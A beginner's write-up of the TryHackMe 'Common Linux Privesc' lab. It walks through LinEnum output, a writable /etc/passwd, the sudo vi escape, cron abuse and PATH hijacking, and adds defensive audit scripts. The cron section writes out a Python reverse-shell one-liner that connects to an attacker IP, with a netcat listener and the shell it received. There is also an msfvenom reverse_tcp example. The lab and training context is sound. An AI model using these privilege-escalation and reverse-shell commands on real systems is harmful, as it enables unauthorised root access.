TryHackMe (THM): Common Linux Privesc Writeup
Hi! Today I’m going to write a Writeup for Try Hack Me.
I’m on the COMPLETE BEGINNER learning path.
The targeted room is Common Linux Privesc. (By the way, what is Privesc?)
Skip where you don’t need an answer.
I will not write a direct answer, just a hint.
First of all, I ran LinEnum according to the instructions and saved the output to a text file.
$ ./LinEnum.sh > out_LinEnum.txt
#2 What is the target’s hostname?
$ more out_LinEnum.txt
#3 Look at the output of /etc/passwd how many “user[x]” are there on the system?
[-] Group memberships:
uid=1000(user1) gid=1000(user1) groups=1000(user1)
uid=1001(user2) gid=1001(user2) groups=1001(user2)
uid=1002(user3) gid=1002(user3) groups=1002(user3)
uid=1003(user4) gid=1003(user4) groups=1003(user4),0(root)
uid=120(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=1004(user5) gid=1004(user5) groups=1004(user5)
uid=1005(user6) gid=1005(user6) groups=1005(user6)
uid=121(mysql) gid=131(mysql) groups=131(mysql)
uid=1006(user7) gid=0(root) groups=0(root)
uid=1007(user8) gid=1007(user8) groups=1007(user8)
#4 How many available shells are there on the system?
[-] Available shells:
# /etc/shells: valid login shells
#5 What is the name of the bash script that is set to run every 5 minutes by cron?
[-] Crontab contents:
# m h dom mon dow user command
*/5 * * * * root /home/user4/Desktop/autoscript.sh
#6 What critical file has had its permissions changed to allow some users to write to it?
[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar 6 2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun 5 2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22 2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar 6 2020 /etc/shadow
I didn’t notice it because it was written at the bottom.😓
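The LinEnum sections behind questions 3, 5 and 6 (user accounts, the root cron job, writable sensitive files) can be re-checked with a few lines of shell. This is an added audit script, not part of the room or of LinEnum; it runs on constructed sample files so it works offline, and on a real host you would pass /etc/passwd and /etc/crontab to the functions instead.

```shell
# Added audit helper, not part of the THM room or LinEnum: re-creates the checks
# behind questions 3, 5 and 6 on constructed sample files so it runs offline.
# On a real host, pass /etc/passwd and /etc/crontab to the functions instead.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
PASSWD="$SAMPLE_DIR/passwd"
CRONTAB="$SAMPLE_DIR/crontab"

# Constructed /etc/passwd: user7's primary group is gid 0, as in the room.
cat > "$PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
user1:x:1000:1000::/home/user1:/bin/bash
user4:x:1003:1003::/home/user4:/bin/bash
user7:x:1006:0::/home/user7:/bin/bash
EOF
chmod 664 "$PASSWD"   # group-writable, like the room's /etc/passwd

# Constructed crontab plus the script it runs; the script is left writable.
printf '#!/bin/sh\necho scheduled\n' > "$SAMPLE_DIR/autoscript.sh"
chmod 775 "$SAMPLE_DIR/autoscript.sh"
cat > "$CRONTAB" <<EOF
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root $SAMPLE_DIR/autoscript.sh
EOF

# Question 3: count accounts named user<digits>.
count_user_accounts() { grep -Ec '^user[0-9]+:' "$1"; }
# Non-root accounts whose primary group is gid 0 (root-equivalent on group-owned files).
gid0_accounts() { awk -F: '$4 == 0 && $1 != "root" { print $1 }' "$1"; }
# Question 6: succeed when group (column 6) or others (column 9) may write the file.
is_group_or_world_writable() { ls -ld "$1" | cut -c6,9 | grep -q w; }
# Question 5: root cron jobs whose command is a path a non-root user could edit,
# either because root does not own it or because it is group/world-writable.
weak_root_cron_scripts() {
    awk '$1 !~ /^#/ && $6 == "root" && $7 ~ /^\// { print $7 }' "$1" |
    while read -r script; do
        [ -e "$script" ] || continue
        owner=$(ls -ld "$script" | awk '{ print $3 }')
        if [ "$owner" != root ] || is_group_or_world_writable "$script"; then
            echo "$script"
        fi
    done
}

echo "user[x] accounts: $(count_user_accounts "$PASSWD")"
echo "non-root accounts with gid 0: $(gid0_accounts "$PASSWD")"
is_group_or_world_writable "$PASSWD" && echo "$PASSWD is group/world-writable"
echo "root cron scripts a non-root user could edit: $(weak_root_cron_scripts "$CRONTAB")"
```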
Abusing SUID/GUID Files
#1 What is the path of the file in user3’s directory that stands out to you?
Exploiting Writeable /etc/passwd
I was very excited when this was successful for the first time!😁
#2 Having read the information above, what direction privilege escalation is this attack?
Remember the tree
#3 Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: “openssl passwd -1 -salt [salt] [password]”
What is the hash created by using this command with the salt, “new” and the password “123”?
user@kali:~$ openssl passwd -1 -salt new 123
#4 Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?
Just refer to this↓. I didn’t understand the meaning of the hint.
Escaping Vi Editor
#2 Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?
$ sudo -l
*snip*
User user8 may run the following commands on polobox:
(root) NOPASSWD: /usr/bin/vi
#3 What is the flag to specify a payload in msfvenom?
$ msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
*snip*
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
#5 What directory is the “autoscript.sh” under?
grep -r "autoscript.sh" /*
*snip*
/etc/crontab:*/5 * * * * root /home/user4/Desktop/autoscript.sh
After waiting 5 minutes, the essential payload didn’t work.😭
I searched the internet and got the following script. This worked.
printf "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.**.**.**\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" > /home/user4/Desktop/autoscript.sh
When I listened on port 1234, I was able to receive the shell!
user@kali:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.4.16.12] from (UNKNOWN) [10.10.112.25] 48904
/bin/sh: 0: can't access tty; job control turned off
Exploiting PATH Variable
#2 Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?
Desktop Documents Downloads Music Pictures Public script Templates Videos
#4 Now we’re inside tmp, let’s create an imitation executable. The format for what we want to do is:
echo "[whatever command we want to run]" > [name of the executable we're imitating]
What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating?
Just refer to this↓
echo "[whatever command we want to run]" > [name of the executable we're imitating]
#5 Great! Now we’ve made our imitation, we need to make it an executable. What command do we execute to do this?
I already learned this in the "Learn Linux" room, where the syntax of this command is given as chmod <permissions> <file>.
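The PATH trick above only works because a directory the user can write to is searched before the real command. As an added check that is not part of the room, the function below classifies each entry of a PATH value by the reason it could let an imitation executable be found first; it runs here on a constructed PATH rather than the live one.

```shell
# Added check, not part of the room: classify each PATH entry by why it could
# let an imitation executable (like the "script" trick above) be found first.
# Takes the PATH value as $1, so it is run here on a constructed value.
risky_path_entries() {
    printf '%s\n' "$1" | tr ':' '\n' | while read -r dir; do
        case "$dir" in
            '')  echo "(empty) -> current directory is searched" ;;
            /*)  if [ -d "$dir" ] && [ -w "$dir" ]; then
                     echo "$dir -> writable by $(id -un)"
                 fi ;;
            *)   echo "$dir -> relative entry, resolved against the current directory" ;;
        esac
    done
}

# Constructed PATH: a writable scratch dir first (as /tmp is in the room), a
# missing dir, an empty entry, a relative entry and a normal system dir.
DEMO_DIR=$(mktemp -d)
trap 'rm -rf "$DEMO_DIR"' EXIT
DEMO_PATH="$DEMO_DIR:/no/such/dir::bin:/usr/bin"
risky_path_entries "$DEMO_PATH"
```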
Thank you for reading.